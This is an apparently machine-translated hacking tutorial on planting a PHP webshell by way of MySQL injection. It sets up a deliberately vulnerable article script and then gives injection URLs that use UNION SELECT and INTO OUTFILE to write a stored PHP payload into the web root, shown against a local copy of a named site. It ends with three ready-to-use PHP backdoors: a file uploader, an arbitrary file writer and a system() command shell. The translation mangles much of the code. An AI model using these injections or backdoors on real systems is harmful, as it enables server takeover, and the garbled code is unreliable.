Research on exporting field content in MySQL injection-exporting webshell through injection

Author: Angel
Nature of the article: original
Release date:
Statement: This article has already been published in "x". For more information, see.

Preface

I remember some articles about how to use MySQL to get shell. What I said is to get a root permission, remotely connect to and create a table, and insert Shell Content in it, then, use into OUTFILE to export to the corresponding directory, and a backdoor is created. I have never cared about it because there are very few opportunities to directly operate MySQL databases, and I have already mastered it, so I don't have to take this technology all day long and forget it. After reading my articles "SQL injection with MySQL" and "Advanced SQL injection with MySQL", super Hei told me if I could use the data export technology in injection, in this way, shell can be obtained through injection. In fact, the article about exporting data has been mentioned in SQL injection with MySQL, which is also quite detailed. This article only discusses how to obtain shell through injection, which has great limitations. This is a flexible technology, depending on the actual situation. However, if it is used successfully, it directly threatens the security of the host.

Implementation Principle

As we all know, MySQL cannot execute script. asp like MSSQL? Id = 1; insert into table (field) values ('angel'); -- to insert data, because MySQL uses Union queries at most. The biggest limitation is here-data insertion, so we can only start with the existing functions of the program. In fact, many programs can submit comments, comments, and posts, it depends on how the program inserts variables into the database. In fact, the road is on our side and we can open it up on our own.
Needless to say, let's look at a simple example of local testing to create a table with the following structure:

Program code create table 'Article '(
'Articleid' int not null auto_increment,
'Title' varchar (200) not null,
'Content' text not null,
'Visible 'int default '1' not null,
Primary Key ('articleid ')
);

View the file show. php of the article as follows:

Program code <? PHP
$ Servername = "localhost ";
$ Dbusername = "root ";
$ Dbpassword = "";
$ Dbname = "injection ";
Mysql_connect ($ servername, $ dbusername, $ dbpassword) or die ("database connection failed ");

$ SQL = "select * from article where ArticleID = $ ID and visible = 1 ";
$ Result = mysql_db_query ($ dbname, $ SQL );
$ ROW = mysql_fetch_array ($ result );

If (! $ Row ){
Echo "this record does not exist ";
Echo "<p> SQL query: $ SQL <p> ";
Exit;
}

Function html_clean ($ content ){
$ Content = htmlspecialchars ($ content );
$ Content = str_replace ("/N", "<br>", $ content );
$ Content = str_replace ("", "& nbsp;", $ content );
$ Content = str_replace ("/T", '& nbsp;', $ content );
Return $ content;
}

Echo "<title>". $ row ['title']. "</title> ";
Echo "<B> title: </B>". htmlspecialchars ($ row ['title']). "<HR>/N ";
Echo "<B> content: </B> <p>". html_clean ($ row ['content']). "</P> <HR>/N ";
Echo "SQL query: $ SQL ";
?>

Add. php files submitted by visitors are as follows:

Program code <?
$ Servername = "localhost ";
$ Dbusername = "root ";
$ Dbpassword = "";
$ Dbname = "injection ";
Mysql_connect ($ servername, $ dbusername, $ dbpassword) or die ("database connection failed ");

If ($ _ post ['action'] = "add "){
If ($ Title = "" or $ content = ""){
Echo "You have not completed the form. ";
Exit;
} Else {
$ SQL = "insert into article (title, content, visible) values ('$ title',' $ content', '0 ')";
// If the visible field is 1, this article is displayed.
// Because it is submitted by a visitor, it must be inserted with 0, and updated to 1 after the Administrator review.
Mysql_db_query ($ dbname, $ SQL );
Mysql_close ();
Echo "you have submitted the application and are waiting for the Administrator to review it. ";
Exit;
}
}
?>
<Form action = "Add. php" method = "Post">
Article Title: <br> <input name = "title" type = "text" size = "50" maxlength = "100"> <p>
Article content: <br> <textarea name = "content" Cols = "50" rows = "15"> </textarea> <p>
<Input type = "hidden" name = "action" value = "add"> <input type = "Submit" value = "Submit">
</Form>

Many programs directly insert user data into the database and use functions for processing when calling them, just like show. php above. This creates an opportunity for us to write our webshell into the database. Few programs Insert the variable into the database after processing, and vBB is directly stored.
When we access add. php and submit our code to the content of the article, the article is hidden. How do we know the ID of the article? It is actually very simple:

Program code http: // 127.0.0.1/injection/show. php? Id = 2
# In this way, you can browse normal articles. If the articles are not displayed, the system will prompt that they do not exist.
Http: // 127.0.0.1/injection/show. php? Id = 2 /*
# In this way, you can comment out the judgment of the visible field to display the hidden articles.

Pay attention to the SQL query. If we comment out the subsequent judgment, we can change the ID to find our article. We just submitted the complete code, this code is a small upload backdoor that I wrote. It can upload any type of files to the directory where the script is located, but the size cannot exceed PhP. settings in ini.
Now that the code has been written, we have started to construct our into OUTFILE statement. As long as the statements are correctly constructed, our exported file will lie in the pre-defined directory. As for how to find the absolute web path, how to find a directory with writable permissions is not covered in this article. I believe this is hard for everyone. Submit:

Program code http: // 127.0.0.1/injection/show. php? Id = 2 into OUTFILE 'f:/www/1. php '/*

The following prompt is returned:

See it? The SQL statement is correct. Despite the error message, as long as the directory exists and can be written, the file must have been exported:

The uploaded webshell is also executed normally because the PHP code is not damaged. In the back step, even if the quotation marks of the form are broken, we can still construct the form locally.

Instance

I believe you have some knowledge and ideas about exporting webshells through injection. The above is the simplest and smoothest example. It seems that the conditions are harsh, the actual conditions are everywhere, it seems simple, and there is a lot of space for practical use. If it is used flexibly, the harm is not small. Let's look at a more practical example, it can be viewed as a complete penetration test.
Since I cannot access the Internet now, I am building a local and http://www.4ngel.net a touch of the site for penetration, all the databases and files are the same as online, articles and forums share a database, I backed it up the day before yesterday. I have removed the $ id filtering code from the showarticle. php file. Form a website with vulnerabilities (a bit grievance, 55555 ).

Note: The current environment is magic_quotes_gpc = off. Some programs process input variables, such as vBB. Therefore, it doesn't matter if GPC is enabled or disabled.

There is no place for the entire site to submit articles, comments, or comments. We cannot submit our code from the site. Fortunately, there is a forum, haha, many of which can submit our data, post, signature, etc. Let's write the webshell code in the signature.

Then we can query the signature content across tables through the injection points on the article page, and export the content. With webshell, even if safe_mode is blocked, we need to penetrate the server, there is almost no problem. You can see the 5th images above. The article queries five fields, and now we will use Union to join the query, union queries are clearly stated in My SQL injection with MySQL, and will not be elaborated here. In the query after union, five fields ", 1" are also specified to query the angel user in the User table. userid is 1. If the structure is correct, the user exists. The page will return normally:

Let's see if we can really query the signature content of the forum. We saw the wrong SQL statement just now. We know that there are 5th fields to query the content of the article, the field name of the signature is "signature". We Replace the first 1 with "signature", and then specify a non-existent value for the previous $ id, in this way, the signature content can be displayed in the original content of the article. Structure:

Program code http: // 127.0.0.1/showarticle. php? Id = 55' Union select, signature from user where userid = 1 /*

Well, the query is successful. Let's start exporting it. My local web directory is F:/www, which I know. Well, when we use it, do not ask me how to obtain the absolute web path.
Then add into OUTFILE to the statement we constructed just now and submit it:

Program code http: // 127.0.0.1/showarticle. php? Id = 55' Union select, signature from user where userid = 1 into OUTFILE 'f:/www/angel. php '/*

Well, there is an error message. No matter whether it is, we didn't create a wrong statement, and my f disk is completely controlled by everyone. Naturally, our angel. php has also come out:

The seemingly complex things are actually easy to grasp. The most important thing is flexibility. The code of the Program varies. With the features of PHP, there are a variety of methods to use, but pay attention to one thing, that is, to export data, single quotes must not be broken. They may come from program code or magic_quotes_gpc. As long as single quotes are broken, the success rate is almost zero.
Please do not use the site of Security angel to train your hands. Since this article is written by me, my site will not have this problem.

Postscript

I hope this article will give you some valuable insights. Other deeper technologies can be explored by yourself. If there are any mistakes or misunderstandings in this article, you can contact me at the security Angel forum. The following are some PHP Backdoors that I wrote and often used. Since I was just learning PHP, the following code may have many problems. If you want to use PHP backdoors with more powerful functions. We recommend that you download my phpspy.

PHP Upload Backdoor

Program code <? PHP
// Codz by Angel on 2004, May 26
// Powered by security Angel team
$ MSG = copy ($ _ FILES [myfile] [tmp_name], $ _ FILES [myfile] [name])? "Upload successful": "Upload Failed ";
Echo $ MSG;
?>
<Form enctype = "multipart/form-Data" Action = "" method = "Post">
<Input name = "myfile" type = "file">
<Input value = "Submit" type = "Submit"> </form>

PHP file-generated Backdoor

Program code <? PHP
// Codz by Angel on 2004, May 26
// Powered by security Angel team
// Remove escape characters
Function stripslashes_array (& $ array ){
While (List ($ key, $ var) = each ($ array )){
If ($ key! = 'Argc '& $ key! = 'Argv' & (strtoupper ($ key )! = $ Key | ''. intval ($ key) =" $ key ")){
If (is_string ($ var )){
$ Array [$ key] = stripslashes ($ var );
}
If (is_array ($ var )){
$ Array [$ key] = stripslashes_array ($ var );
}
}
}
Return $ array;
}

// Determine the magic_quotes_gpc status
If (get_magic_quotes_gpc ()){
$ _ Post = stripslashes_array ($ _ post );
}

// Perform the operation
If ($ _ post ['action'] = "CREATE "){
$ Fp = @ fopen ("". $ _ post ['filename']. "", "WB ");
$ Content = $ _ post ['filedate'];
$ Fw = @ fwrite ($ FP, $ content );
If ($ fw ){
Echo "<B> congratulations, the file is successfully written! </B> <a href = ". $ php_self."> return </a> ";
Exit;
} Else {
Echo "<B> failed to write the file. Is it a permission issue? </B> <a href = ". $ php_self."> return </a> ";
Exit;
}
@ Fclose ($ FP );
}
?>
<Form action = "" method = "Post">
Saved file name (for example, <font color = "# ff0000"> angel. php </font>): <br>
<Input type = "text" name = "FILENAME" size = "60">
<P>
Save the file in: <br> <? = Str_replace ('/', '/', dirname (_ file _)?>
<P>
File Content:
<Br> <textarea name = "filedate" Cols = "60" rows = "10"> </textarea> <br>
<Input type = "hidden" name = "action" value = "CREATE"> <input type = "Submit" value = "save">
</Form>
<B> Note: when the same file exists, the content will be completely rewritten! </B>

Execute Command-type Backdoor

Program code <? PHP
// Codz by Angel on 2004, May 26
// Powered by security Angel team
// A very simple shell, it is estimated that there will be many problems.
?>
<Form action = "" method = "Post">
Command: <br>
<Input type = "text" name = "command" size = "60" <? PHP if ($ command) {echo "value =/" $ command/"" ;}?>> <Input name = "submit_btn" type = "Submit" value = ""> </P>
Execution result: <br>
<Textarea Cols = "80" rows = "20" readonly> <? Phpif ($ command) {system ($ command) ;}?> </Textarea> <p>
Note: Some commands on Windows hosts may have restrictions </form>